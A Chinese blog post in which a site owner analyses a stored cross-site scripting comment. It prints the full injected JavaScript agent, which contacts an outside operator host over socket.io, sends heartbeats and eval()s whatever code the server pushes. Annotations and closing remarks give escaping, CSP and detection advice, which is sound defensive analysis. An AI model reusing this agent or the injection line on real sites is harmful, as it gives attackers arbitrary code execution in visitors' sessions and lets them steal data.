个站攻防——跨站脚本攻击

IT黑名单 2017-7-20 16:44:34

偶然间发现网站评论区内有如下的评论内容:
<script src="http://t.cn/R6Ocbrq"></script>
出于某些原因,网站并没有禁止用户提交html代码段,而且也会原样输出到浏览器。
以上短地址是来自hack网站的一段js脚本,原地址为:https://dev.hacktask.org/p/58de5339fa8289001b5a7036/
js脚本内容如下:
/*
 * Annotated copy of the script that the injected comment
 * <script src="http://t.cn/R6Ocbrq"></script> pulled into every visitor's browser.
 * It is a browser-side agent for a remote "project": it loads socket.io from the
 * operator's host, opens a socket, checks in with a project id, heartbeats every
 * 5 s, and then eval()s whatever JavaScript the server pushes over the "inject"
 * event -- i.e. arbitrary remote code execution inside the victim's session on
 * this site, with access to anything the page itself can read or request.
 *
 * Defensive takeaways for the site operator: HTML-escape user-submitted content
 * on output (or run it through a sanitizer that strips script tags and
 * event-handler attributes), and ship a Content-Security-Policy that disallows
 * inline and third-party script so a stray <script src> cannot execute even if
 * escaping is missed somewhere.
 * Detection signals visible from this sample: stored comments containing
 * "<script", and page-initiated requests for "/socket.io/socket.io.js" from a
 * host the site does not own.
 */
"use strict";
// Transpiler-style class helpers (the _typeof/_createClass/_classCallCheck trio,
// presumably emitted by a build tool rather than hand-written): a typeof shim
// that reports "symbol" for Symbol polyfill instances, an Object.defineProperty
// based method installer, and a "called without new" guard that throws TypeError.
// No payload logic lives here.
var _typeof=typeof Symbol==="function"&&typeof Symbol.iterator==="symbol"?function(obj){return typeof obj}:function(obj){return obj&&typeof Symbol==="function"&&obj.constructor===Symbol&&obj!==Symbol.prototype?"symbol":typeof obj};
var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||false;descriptor.configurable=true;if("value"in descriptor)descriptor.writable=true;Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){if(protoProps)defineProperties(Constructor.prototype,protoProps);if(staticProps)defineProperties(Constructor,staticProps);return Constructor}}();
function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor)){throw new TypeError("Cannot call a class as a function")}}
// Client: the agent itself. Everything below is the C2-style client logic.
var Client=function(){
// Client(projectId, host, protocol): stores the three fields, builds basePath as
// "<protocol>://<host>", injects "<basePath>/socket.io/socket.io.js" via loadJS and,
// once that script has loaded, creates the socket with Socket().
// `io` used in Socket() is not declared in this listing; it is expected to be the
// global defined by the socket.io script loaded here.
function Client(projectId,host,protocol){var _this=this;_classCallCheck(this,Client);this.projectId=projectId;this.host=host;this.protocol=protocol;this.basePath=this.protocol+"://"+this.host;
this.loadJS(this.basePath+"/socket.io/socket.io.js",function(){_this.socket=_this.Socket()})}
_createClass(Client,[
// Socket(): connects to "<basePath>/client" and wires the protocol:
//   "connect"    -> emits "init" carrying the projectId (registers this browser)
//   "init"       -> if the server acknowledged, emits "alive" with a Date every 5000 ms
//   "inject"     -> action "plugin": eval()s data.data and instantiates the result with
//                   (data.args, this); action "code": eval()s data.data directly.
//                   Either branch runs arbitrary server-supplied JS in the page origin;
//                   errors are only console.log'd, never reported back.
//   "disconnect" -> closes the socket
// The Chinese console.log strings are status messages (server connected / failed,
// check-in succeeded / failed, plugin ran / failed, unknown command).
{key:"Socket",value:function Socket(){var _this2=this;
var socket=io.connect(this.basePath+"/client");
socket.on("connect",function(err){if(err)return console.log("服务器连接失败",err);console.log("服务器连接成功");_this2.socket.emit("init",_this2.projectId)})
.on("init",function(result){if(!result)return console.log("上线失败");console.log("上线成功",result);setInterval(function(){socket.emit("alive",new Date)},5e3)})
.on("inject",function(data){switch(data.action){
case"plugin":try{var plugin=eval(data.data);new plugin(data.args,_this2);console.log("执行插件成功",plugin)}catch(err){console.log("执行插件失败",err,data)}break;
case"code":try{eval(data.data)}catch(err){console.log(err)}break;
default:console.log("未知指令",data.action);break}})
.on("disconnect",function(){socket.close()});
// NOTE(review): the "connect" handler above emits through _this2.socket, which is
// only assigned from this function's return value. As printed on this page the
// `return` is followed by a line break, so ASI would read it as `return;` and
// _this2.socket would stay undefined -- presumably a wrapping artifact of the
// page rather than the original script, which would read `return socket`.
return 
socket}},
// loadJS(url, callback, charset): classic script-tag loader. Appends an async
// <script src=url> (charset defaults to "utf-8") to <head>; when the tag reports
// load / readyState "loaded|complete" it removes itself, clears both handlers and
// invokes callback if one was given.
{key:"loadJS",value:function loadJS(url,callback,charset){var head=document.head||document.getElementsByTagName("head")[0]||document.documentElement;var script=document.createElement("script");script.src=url;script.async=true;script.charset=charset||"utf-8";script.onload=script.onreadystatechange=function(){if(!script.readyState||/loaded|complete/.test(script.readyState)){script.parentNode.removeChild(script);script.onload=script.onreadystatechange=null;script=null;if(callback&&typeof callback==="function"){callback()}}};head.appendChild(script)}},
// listen(callback): drops any previous "send" listener, then subscribes callback
// to the "send" event; returns this for chaining.
{key:"listen",value:function listen(callback){this.removeListen();this.socket.on("send",callback);return this}},
// removeListen(): calls this.socket.removeEventListener("send"). Whether the socket
// object actually exposes that method is not shown in this listing.
{key:"removeListen",value:function removeListen(){this.socket.removeEventListener("send");return this}},
// callback(data, opts): coerces data to a string (JSON.stringify for objects,
// String() otherwise), wraps it as {value, type:"string", save:false}, copies every
// enumerable key of opts over it with for-in (inherited keys included) and emits
// "callback". Presumably the channel by which injected code reports results back
// to the server; the server-side handling is not visible here.
{key:"callback",value:function callback(data,opts){var _data=typeof data==="string"?data:(typeof data==="undefined"?"undefined":_typeof(data))==="object"?JSON.stringify(data):String(data);var result={value:_data,type:"string",save:false};for(var _ in opts){result[_]=opts[_]}this.socket.emit("callback",result);return this}}]);
return Client}();
// Hard-coded operator endpoint, exactly as it appears on the page (treat these as
// indicators of compromise): project id 58de5339fa8289001b5a7036 at
// https://dev.hacktask.org. The agent runs as soon as the script is parsed and is
// exposed as window.client (injected plugins also receive the instance as their
// second argument).
var projectId="58de5339fa8289001b5a7036";var protocol="https";var host="dev.hacktask.org";
window.client=new Client(projectId,host,protocol);
大致上就是在用户客户端建立了一个websocket连接,进而获取用户数据,还好发现得及时(写文时已发现很久,一直没记录下来),而且站内也没什么数据可供窃取。无论如何,如果允许用户输入html代码段,那么展示时一定要加以限制(例如输出时做HTML转义),最好是不允许用户直接输入脚本代码,全部作为纯文本展示。